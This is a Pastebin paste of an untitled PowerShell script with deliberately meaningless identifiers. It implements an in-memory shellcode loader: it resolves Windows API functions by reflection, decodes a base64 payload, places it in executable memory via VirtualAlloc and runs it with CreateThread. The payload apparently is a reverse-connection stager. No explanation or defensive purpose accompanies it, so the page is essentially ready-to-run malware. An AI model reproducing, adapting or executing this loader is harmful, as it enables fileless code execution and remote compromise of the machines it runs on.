SHARE
TWEET

Untitled

a guest Jun 16th, 2019 48 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function uY {
  2.     Param ($luOE, $pL15V)      
  3.     $zA = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
  4.    
  5.     return $zA.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($zA.GetMethod('GetModuleHandle')).Invoke($null, @($luOE)))), $pL15V))
  6. }
  7.  
  8. function vr {
  9.     Param (
  10.         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $jY,
  11.         [Parameter(Position = 1)] [Type] $uT = [Void]
  12.     )
  13.    
  14.     $ftU = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
  15.     $ftU.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $jY).SetImplementationFlags('Runtime, Managed')
  16.     $ftU.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $uT, $jY).SetImplementationFlags('Runtime, Managed')
  17.    
  18.     return $ftU.CreateType()
  19. }
  20.  
  21. [Byte[]]$heJr = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmgKAAIFaAIAAbuJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAz/Tgh17GjwtaJW/9VqAGoEVldoAtnIX//VizZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//VAcMpxnXuww==")
  22.        
  23. $aqu = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((uY kernel32.dll VirtualAlloc), (vr @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $heJr.Length,0x3000, 0x40)
  24. [System.Runtime.InteropServices.Marshal]::Copy($heJr, 0, $aqu, $heJr.length)
  25.  
  26. $vKL = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((uY kernel32.dll CreateThread), (vr @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$aqu,[IntPtr]::Zero,0,[IntPtr]::Zero)
  27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((uY kernel32.dll WaitForSingleObject), (vr @([IntPtr], [Int32]))).Invoke($vKL,0xffffffff) | Out-Null
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top